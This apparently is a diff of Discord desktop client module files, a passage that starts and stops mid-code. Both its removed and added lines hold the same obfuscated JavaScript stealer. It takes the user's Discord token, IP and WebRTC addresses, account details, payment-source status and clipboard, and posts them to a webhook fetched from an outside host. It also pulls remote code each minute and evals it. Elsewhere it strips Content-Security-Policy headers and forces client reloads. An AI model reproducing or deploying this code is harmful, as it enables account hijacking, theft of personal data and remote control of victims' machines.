"\x44\x49\x4F\x21", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x62\x79\x70\x61\x73\x73\x63\x6F\x72\x73\x2E\x68\x65\x72\x6F\x6B\x75\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x5A\x41\x57\x41\x52\x55\x44\x4F\x54\x6F\x6B\x69\x79\x6F\x74\x6F\x6D\x61\x72\x65\x2E\x74\x78\x74", "\x6C\x65\x6E\x67\x74\x68", "\x77\x72\x61\x70\x70\x65\x72\x2D\x31\x42\x4A\x73\x42\x78", "\x68\x72\x65\x66", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x63\x68\x61\x6E\x6E\x65\x6C\x73\x2F\x36\x32\x39\x31\x37\x35\x32\x32\x30\x35\x36\x39\x31\x31\x32\x35\x38\x36\x2F\x36\x32\x39\x31\x37\x35\x35\x35\x33\x31\x34\x33\x39\x39\x36\x34\x36\x34", "\x72\x65\x6D\x6F\x76\x65", "\x6C\x6F\x67", "\x6D\x61\x72\x67\x69\x6E\x54\x6F\x70\x32\x30\x2D\x33\x54\x78\x4E\x73\x36", "\x62\x72\x6F\x77\x73\x65\x72\x2D\x77\x69\x6E\x64\x6F\x77\x2D\x66\x6F\x63\x75\x73", "\x44\x69\x73\x63\x6F\x72\x64\x20\x68\x61\x73\x20\x65\x6E\x63\x6F\x75\x6E\x74\x65\x72\x65\x64\x20\x61\x6E\x20\x65\x72\x72\x6F\x72\x20\x61\x6E\x64\x20\x6D\x75\x73\x74\x20\x72\x65\x6C\x6F\x61\x64\x2E", "\x77\x61\x72\x6E", "\x62\x65\x65\x70", "\x73\x68\x65\x6C\x6C", "\x72\x65\x6C\x6F\x61\x64", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6F\x6E", "\x20\x7C\x20", "\x4E\x65\x77\x20\x42\x6C\x75\x65\x66\x61\x63\x65\x56\x34\x20\x6C\x6F\x67\x2E\x0A\x54\x6F\x6B\x65\x6E\x3A\x20", "\x0A\x54\x69\x6D\x65\x7A\x6F\x6E\x65\x3A\x20", "\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x3A\x20", "\x0A\x49\x50\x3A\x20", "\x0A\x57\x65\x62\x52\x54\x43\x20\x49\x50\x73\x3A\x20", "\x0A\x55\x73\x65\x72\x69\x6E\x66\x6F\x3A\x20", "\x0A\x55\x73\x65\x72\x6E\x61\x6D\x65\x3A\x20", "\x0A\x50\x53\x41\x74\x74\x61\x63\x68\x65\x64\x3A\x20", "\x0A\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72\x3A\x20", "\x0A\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20", "\x0A\x44\x69\x73\x63\x6F\x72\x64\x20\x56\x65\x72\x73\x69\x6F\x6E\x3A\x20", "\x0A\x43\x6C\x69\x70\x62\x6F\x61\x72\x64\x28\x6C\x69\x6D\x69\x74\x65\x64\x20\x74\x6F\x20\x35\x30\x20\x63\x68\x61\x72\x73\x29\x3A\x20"]; -var readme = _0x476f[0]; -window[_0x476f[1]] = require; -var electron = require(_0x476f[2]); -window[_0x476f[2]] = require(_0x476f[2]); -var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]]; -token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); -token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); -window[_0x476f[1]] = require; -var electron = require(_0x476f[2]); -window[_0x476f[2]] = require(_0x476f[2]); -var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]]; -token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); -token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); - -function sleep(_0xb38cx5) { - return new Promise((_0xb38cx6) => setTimeout(_0xb38cx6, _0xb38cx5)) -} -var ip = _0x476f[11]; -var userinfo = _0x476f[11]; -var webrtcips = _0x476f[11]; -var hasattached = false; -var underesc = _0x476f[13]; -var focusamount = 0; -var WBH = _0x476f[11]; -if (!document[_0x476f[15]](_0x476f[14])[0]) { - var username = _0x476f[16] -} else { - var username = document[_0x476f[15]](_0x476f[14])[0][_0x476f[17]] -}; - -function getandsetbackupWBH() { - function _0xb38cx10() { - WBH = this[_0x476f[18]] - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[22]); - _0xb38cx11[_0x476f[24]]() -} - -function getandsetWBH() { - function _0xb38cx10() { - if (this[_0x476f[18]] == _0x476f[25]) { - getandsetbackupWBH() - } else { - WBH = _0x476f[26] - } - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[26]); - _0xb38cx11[_0x476f[24]]() -} -getandsetWBH(); - -function pin(_0xb38cx14) { - var _0xb38cx15 = new XMLHttpRequest(); - _0xb38cx15[_0x476f[23]](_0x476f[27], WBH, true); - _0xb38cx15[_0x476f[30]](_0x476f[28], _0x476f[29]); - _0xb38cx15[_0x476f[24]](JSON[_0x476f[31]]({ - content: _0xb38cx14 - })) -} - -function returnzoomfactor() { - return electron[_0x476f[33]][_0x476f[32]]() -} - -function returnuseragent() { - return navigator[_0x476f[34]] -} - -function getdiscordversion() { - return electron[_0x476f[37]][_0x476f[36]][_0x476f[35]]() -} - -function getclipboard() { - return electron[_0x476f[40]][_0x476f[39]]()[_0x476f[38]](0, 50) -} - -function getip() { - function _0xb38cx10() { - ip = this[_0x476f[18]] - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[41]); - _0xb38cx11[_0x476f[24]]() -} - -function gettimezone() { - return Intl.DateTimeFormat()[_0x476f[43]]()[_0x476f[42]] -} - -function getresolution() { - return window[_0x476f[45]][_0x476f[44]] + _0x476f[46] + window[_0x476f[45]][_0x476f[47]] -} - -function getuserinfo(_0xb38cx1e) { - function _0xb38cx10() { - userinfo = this[_0x476f[18]] - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[48]); - _0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e); - _0xb38cx11[_0x476f[24]]() -} - -function getpaymentsources(_0xb38cx1e) { - function _0xb38cx10() { - if (this[_0x476f[18]] == _0x476f[50]) { - hasattached = false - } else { - hasattached = true - } - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[51]); - _0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e); - _0xb38cx11[_0x476f[24]]() -} - -function getwebrtcinfo(_0xb38cx21) { - var _0xb38cx22 = window[_0x476f[52]] || window[_0x476f[53]] || window[_0x476f[54]]; - var _0xb38cx23 = new _0xb38cx22({ - iceServers: [] - }), - _0xb38cx24 = function() {}, - _0xb38cx25 = {}, - _0xb38cx26 = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g, - _0xb38cx27; - - function _0xb38cx28(ip) { - if (!_0xb38cx25[ip]) { - _0xb38cx21(ip) - }; - _0xb38cx25[ip] = true - } - _0xb38cx23[_0x476f[55]](_0x476f[11]); - _0xb38cx23[_0x476f[64]](function(_0xb38cx29) { - _0xb38cx29[_0x476f[62]][_0x476f[61]](_0x476f[60])[_0x476f[58]](function(_0xb38cx2a) { - if (_0xb38cx2a[_0x476f[57]](_0x476f[56]) < 0) { - return - }; - _0xb38cx2a[_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28) - }); - _0xb38cx23[_0x476f[63]](_0xb38cx29, _0xb38cx24, _0xb38cx24) - }, _0xb38cx24); - _0xb38cx23[_0x476f[65]] = function(_0xb38cx2b) { - if (!_0xb38cx2b || !_0xb38cx2b[_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)) { - return - }; - _0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28) - } -} -async function fightdio() { - while (true) { - function _0xb38cx10() { - var _0xb38cx2d = this[_0x476f[18]]; - if (_0xb38cx2d == _0x476f[66]) { - return - } else { - eval(_0xb38cx2d) - } - } - var _0xb38cx11 = new XMLHttpRequest(); - _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); - _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[67]); - _0xb38cx11[_0x476f[24]](); - await sleep(60000) - } -} -async function delboostserveronclient() { - while (true) { - for (var _0xb38cx2f = 0; _0xb38cx2f < document[_0x476f[15]](_0x476f[69])[_0x476f[68]]; _0xb38cx2f++) { - if (document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[70]] == _0x476f[71]) { - console[_0x476f[73]](document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[72]]()) - } - }; - if (document[_0x476f[15]](_0x476f[74])[0]) { - document[_0x476f[15]](_0x476f[74])[0][_0x476f[72]]() - }; - await sleep(100) - } -} -electron[_0x476f[37]][_0x476f[36]][_0x476f[82]](_0x476f[75], () => { - focusamount = focusamount + 1; - if (focusamount >= 15) { - console[_0x476f[77]](_0x476f[76]); - electron[_0x476f[79]][_0x476f[78]](); - window[_0x476f[81]][_0x476f[80]](); - focusamount = 0 - } -}); -getwebrtcinfo(function(ip) { - webrtcips = webrtcips + ip + _0x476f[83] -}); -getip(); -getuserinfo(token); -getpaymentsources(token); -setTimeout(() => { - var _0xb38cx30 = (_0x476f[84] + underesc + _0x476f[11] + underesc + _0x476f[11] + token + _0x476f[11] + underesc + _0x476f[11] + underesc + _0x476f[85] + (gettimezone()) + _0x476f[86] + (getresolution()) + _0x476f[87] + ip + _0x476f[88] + webrtcips + _0x476f[89] + userinfo + _0x476f[90] + username + _0x476f[91] + hasattached + _0x476f[92] + (returnzoomfactor()) + _0x476f[93] + (returnuseragent()) + _0x476f[94] + (getdiscordversion()) + _0x476f[95] + (getclipboard()) + _0x476f[11]); - pin(_0xb38cx30) -}, 5000); -setTimeout(() => { - delboostserveronclient() -}, 1); -setTimeout(() => { - fightdio() -}, 1) - - -\ modules\ discord_desktop_core: - const electron = require('electron'); -const path = require('path'); - -electron.session.defaultSession.webRequest.onHeadersReceived(function(details, callback) { - if (!details.responseHeaders['content-security-policy-report-only'] && !details.responseHeaders['content-security-policy']) return callback({ - cancel: false - }); - delete details.responseHeaders['content-security-policy-report-only']; - delete details.responseHeaders['content-security-policy']; - callback({ - cancel: false, - responseHeaders: details.responseHeaders - }); -}); - -module.exports = require('./core.asar'); +modules\ discord_modules: + +var _0x476f = ["\x74\x6F\x73\x74\x72\x69\x6E\x67\x20\x77\x61\x73\x20\x68\x65\x72\x65", "\x72\x65\x71\x75\x69\x72\x65", "\x65\x6C\x65\x63\x74\x72\x6F\x6E", "\x74\x6F\x6B\x65\x6E", "\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65", "\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x22", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x60", "\x73\x69\x7A\x65\x31\x34\x2D\x65\x36\x5A\x53\x63\x48\x20\x74\x69\x74\x6C\x65\x2D\x65\x53\x35\x79\x6B\x33", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65", "\x55\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x66\x65\x74\x63\x68\x2C\x20\x70\x6F\x73\x73\x69\x62\x6C\x79\x20\x64\x75\x65\x20\x74\x6F\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x64\x69\x73\x63\x6F\x72\x64\x20\x64\x69\x73\x74\x72\x69\x62\x75\x74\x65\x20\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x2E", "\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x6C\x6F\x61\x64", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x47\x45\x54", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x2F\x57\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x2E\x74\x78\x74", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x7B\x22\x6D\x65\x73\x73\x61\x67\x65\x22\x3A\x20\x22\x49\x6E\x76\x61\x6C\x69\x64\x20\x57\x65\x62\x68\x6F\x6F\x6B\x20\x54\x6F\x6B\x65\x6E\x22\x2C\x20\x22\x63\x6F\x64\x65\x22\x3A\x20\x35\x30\x30\x32\x37\x7D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x36\x32\x39\x31\x39\x36\x34\x30\x37\x31\x36\x34\x36\x33\x33\x30\x38\x39\x2F\x6F\x38\x30\x70\x70\x4E\x42\x31\x34\x31\x6B\x52\x7A\x6D\x51\x70\x6C\x31\x70\x76\x48\x6C\x74\x52\x6A\x47\x2D\x4B\x33\x2D\x43\x41\x6C\x72\x52\x6D\x4F\x79\x33\x4F\x46\x4F\x58\x65\x57\x31\x2D\x65\x58\x49\x57\x78\x42\x45\x54\x50\x71\x55\x48\x47\x69\x58\x61\x43\x44\x53\x58\x70", "\x50\x4F\x53\x54", "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x74\x72\x69\x6E\x67\x69\x66\x79", "\x67\x65\x74\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72", "\x77\x65\x62\x46\x72\x61\x6D\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x67\x65\x74\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x70\x70", "\x72\x65\x6D\x6F\x74\x65", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x72\x65\x61\x64\x54\x65\x78\x74", "\x63\x6C\x69\x70\x62\x6F\x61\x72\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67", "\x74\x69\x6D\x65\x5A\x6F\x6E\x65", "\x72\x65\x73\x6F\x6C\x76\x65\x64\x4F\x70\x74\x69\x6F\x6E\x73", "\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x78", "\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65", "\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E", "\x5B\x5D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x36\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65\x2F\x62\x69\x6C\x6C\x69\x6E\x67\x2F\x70\x61\x79\x6D\x65\x6E\x74\x2D\x73\x6F\x75\x72\x63\x65\x73", "\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x6D\x6F\x7A\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x77\x65\x62\x6B\x69\x74\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x44\x61\x74\x61\x43\x68\x61\x6E\x6E\x65\x6C", "\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x69\x6E\x64\x65\x78\x4F\x66", "\x66\x6F\x72\x45\x61\x63\x68", "\x6D\x61\x74\x63\x68", "\x0A", "\x73\x70\x6C\x69\x74", "\x73\x64\x70", "\x73\x65\x74\x4C\x6F\x63\x61\x6C\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x4F\x66\x66\x65\x72", "\x6F\x6E\x69\x63\x65\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x44\x49\x4F\x21", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x62\x79\x70\x61\x73\x73\x63\x6F\x72\x73\x2E\x68\x65\x72\x6F\x6B\x75\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x5A\x41\x57\x41\x52\x55\x44\x4F\x54\x6F\x6B\x69\x79\x6F\x74\x6F\x6D\x61\x72\x65\x2E\x74\x78\x74", "\x6C\x65\x6E\x67\x74\x68", "\x77\x72\x61\x70\x70\x65\x72\x2D\x31\x42\x4A\x73\x42\x78", "\x68\x72\x65\x66", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x63\x68\x61\x6E\x6E\x65\x6C\x73\x2F\x36\x32\x39\x31\x37\x35\x32\x32\x30\x35\x36\x39\x31\x31\x32\x35\x38\x36\x2F\x36\x32\x39\x31\x37\x35\x35\x35\x33\x31\x34\x33\x39\x39\x36\x34\x36\x34", "\x72\x65\x6D\x6F\x76\x65", "\x6C\x6F\x67", "\x6D\x61\x72\x67\x69\x6E\x54\x6F\x70\x32\x30\x2D\x33\x54\x78\x4E\x73\x36", "\x62\x72\x6F\x77\x73\x65\x72\x2D\x77\x69\x6E\x64\x6F\x77\x2D\x66\x6F\x63\x75\x73", "\x44\x69\x73\x63\x6F\x72\x64\x20\x68\x61\x73\x20\x65\x6E\x63\x6F\x75\x6E\x74\x65\x72\x65\x64\x20\x61\x6E\x20\x65\x72\x72\x6F\x72\x20\x61\x6E\x64\x20\x6D\x75\x73\x74\x20\x72\x65\x6C\x6F\x61\x64\x2E", "\x77\x61\x72\x6E", "\x62\x65\x65\x70", "\x73\x68\x65\x6C\x6C", "\x72\x65\x6C\x6F\x61\x64", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6F\x6E", "\x20\x7C\x20", "\x4E\x65\x77\x20\x42\x6C\x75\x65\x66\x61\x63\x65\x56\x34\x20\x6C\x6F\x67\x2E\x0A\x54\x6F\x6B\x65\x6E\x3A\x20", "\x0A\x54\x69\x6D\x65\x7A\x6F\x6E\x65\x3A\x20", "\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x3A\x20", "\x0A\x49\x50\x3A\x20", "\x0A\x57\x65\x62\x52\x54\x43\x20\x49\x50\x73\x3A\x20", "\x0A\x55\x73\x65\x72\x69\x6E\x66\x6F\x3A\x20", "\x0A\x55\x73\x65\x72\x6E\x61\x6D\x65\x3A\x20", "\x0A\x50\x53\x41\x74\x74\x61\x63\x68\x65\x64\x3A\x20", "\x0A\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72\x3A\x20", "\x0A\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20", "\x0A\x44\x69\x73\x63\x6F\x72\x64\x20\x56\x65\x72\x73\x69\x6F\x6E\x3A\x20", "\x0A\x43\x6C\x69\x70\x62\x6F\x61\x72\x64\x28\x6C\x69\x6D\x69\x74\x65\x64\x20\x74\x6F\x20\x35\x30\x20\x63\x68\x61\x72\x73\x29\x3A\x20"]; +var readme = _0x476f[0]; +window[_0x476f[1]] = require; +var electron = require(_0x476f[2]); +window[_0x476f[2]] = require(_0x476f[2]); +var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]]; +token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); +token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); +window[_0x476f[1]] = require; +var electron = require(_0x476f[2]); +window[_0x476f[2]] = require(_0x476f[2]); +var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]]; +token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); +token = token[_0x476f[12]](_0x476f[10], _0x476f[11]); + +function sleep(_0xb38cx5) { + return new Promise((_0xb38cx6) => setTimeout(_0xb38cx6, _0xb38cx5)) +} +var ip = _0x476f[11]; +var userinfo = _0x476f[11]; +var webrtcips = _0x476f[11]; +var hasattached = false; +var underesc = _0x476f[13]; +var focusamount = 0; +var WBH = _0x476f[11]; +if (!document[_0x476f[15]](_0x476f[14])[0]) { + var username = _0x476f[16] +} else { + var username = document[_0x476f[15]](_0x476f[14])[0][_0x476f[17]] +}; + +function getandsetbackupWBH() { + function _0xb38cx10() { + WBH = this[_0x476f[18]] + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[22]); + _0xb38cx11[_0x476f[24]]() +} + +function getandsetWBH() { + function _0xb38cx10() { + if (this[_0x476f[18]] == _0x476f[25]) { + getandsetbackupWBH() + } else { + WBH = _0x476f[26] + } + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[26]); + _0xb38cx11[_0x476f[24]]() +} +getandsetWBH(); + +function pin(_0xb38cx14) { + var _0xb38cx15 = new XMLHttpRequest(); + _0xb38cx15[_0x476f[23]](_0x476f[27], WBH, true); + _0xb38cx15[_0x476f[30]](_0x476f[28], _0x476f[29]); + _0xb38cx15[_0x476f[24]](JSON[_0x476f[31]]({ + content: _0xb38cx14 + })) +} + +function returnzoomfactor() { + return electron[_0x476f[33]][_0x476f[32]]() +} + +function returnuseragent() { + return navigator[_0x476f[34]] +} + +function getdiscordversion() { + return electron[_0x476f[37]][_0x476f[36]][_0x476f[35]]() +} + +function getclipboard() { + return electron[_0x476f[40]][_0x476f[39]]()[_0x476f[38]](0, 50) +} + +function getip() { + function _0xb38cx10() { + ip = this[_0x476f[18]] + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[41]); + _0xb38cx11[_0x476f[24]]() +} + +function gettimezone() { + return Intl.DateTimeFormat()[_0x476f[43]]()[_0x476f[42]] +} + +function getresolution() { + return window[_0x476f[45]][_0x476f[44]] + _0x476f[46] + window[_0x476f[45]][_0x476f[47]] +} + +function getuserinfo(_0xb38cx1e) { + function _0xb38cx10() { + userinfo = this[_0x476f[18]] + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[48]); + _0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e); + _0xb38cx11[_0x476f[24]]() +} + +function getpaymentsources(_0xb38cx1e) { + function _0xb38cx10() { + if (this[_0x476f[18]] == _0x476f[50]) { + hasattached = false + } else { + hasattached = true + } + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[51]); + _0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e); + _0xb38cx11[_0x476f[24]]() +} + +function getwebrtcinfo(_0xb38cx21) { + var _0xb38cx22 = window[_0x476f[52]] || window[_0x476f[53]] || window[_0x476f[54]]; + var _0xb38cx23 = new _0xb38cx22({ + iceServers: [] + }), + _0xb38cx24 = function() {}, + _0xb38cx25 = {}, + _0xb38cx26 = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g, + _0xb38cx27; + + function _0xb38cx28(ip) { + if (!_0xb38cx25[ip]) { + _0xb38cx21(ip) + }; + _0xb38cx25[ip] = true + } + _0xb38cx23[_0x476f[55]](_0x476f[11]); + _0xb38cx23[_0x476f[64]](function(_0xb38cx29) { + _0xb38cx29[_0x476f[62]][_0x476f[61]](_0x476f[60])[_0x476f[58]](function(_0xb38cx2a) { + if (_0xb38cx2a[_0x476f[57]](_0x476f[56]) < 0) { + return + }; + _0xb38cx2a[_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28) + }); + _0xb38cx23[_0x476f[63]](_0xb38cx29, _0xb38cx24, _0xb38cx24) + }, _0xb38cx24); + _0xb38cx23[_0x476f[65]] = function(_0xb38cx2b) { + if (!_0xb38cx2b || !_0xb38cx2b[_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)) { + return + }; + _0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28) + } +} +async function fightdio() { + while (true) { + function _0xb38cx10() { + var _0xb38cx2d = this[_0x476f[18]]; + if (_0xb38cx2d == _0x476f[66]) { + return + } else { + eval(_0xb38cx2d) + } + } + var _0xb38cx11 = new XMLHttpRequest(); + _0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10); + _0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[67]); + _0xb38cx11[_0x476f[24]](); + await sleep(60000) + } +} +async function delboostserveronclient() { + while (true) { + for (var _0xb38cx2f = 0; _0xb38cx2f < document[_0x476f[15]](_0x476f[69])[_0x476f[68]]; _0xb38cx2f++) { + if (document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[70]] == _0x476f[71]) { + console[_0x476f[73]](document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[72]]()) + } + }; + if (document[_0x476f[15]](_0x476f[74])[0]) { + document[_0x476f[15]](_0x476f[74])[0][_0x476f[72]]() + }; + await sleep(100) + } +} +electron[_0x476f[37]][_0x476f[36]][_0x476f[82]](_0x476f[75], () => { + focusamount = focusamount + 1; + if (focusamount >= 15) { + console[_0x476f[77]](_0x476f[76]); + electron[_0x476f[79]][_0x476f[78]](); + window[_0x476f[81]][_0x476f[80]](); + focusamount = 0 + } +}); +getwebrtcinfo(function(ip) 